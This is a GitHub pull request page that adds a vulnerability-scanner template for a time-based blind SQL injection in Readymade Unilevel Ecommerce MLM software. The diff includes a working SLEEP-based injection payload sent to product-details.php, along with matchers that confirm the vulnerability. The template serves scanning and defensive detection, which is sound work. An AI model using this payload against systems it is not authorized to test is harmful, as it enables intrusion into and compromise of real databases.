Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

add readymade sqli #10453

Merged
merged 2 commits into from
Aug 25, 2024
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
30 changes: 30 additions & 0 deletions http/vulnerabilities/other/readymade-unilevel-sqli.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: readymade-unilevel-sqli

info:
name: Readymade Unilevel Ecommerce MLM - SQL Injection
author: securityforeveryone
severity: high
description: |
Readymade Unilevel Ecommerce software has sql vulnerability in product-details.php?id
reference:
- https://packetstormsecurity.com/files/179886/ReadyMade-Unilevel-Ecommerce-MLM-Blind-SQL-Injection-Cross-Site-Scripting.html
metadata:
vendor: i-netsolution
product: readymade-unilevel-ecommerce
tags: ecommerce,readymade,sqli

http:
- raw:
- |
@timeout 30s
GET /product-details.php?id=1%20AND%20(SELECT%206812%20FROM%20(SELECT(SLEEP(6)))DddL) HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type,"text/html")'
- 'contains_all(body, "user_login_id", "Products</a>")'
condition: and
Loading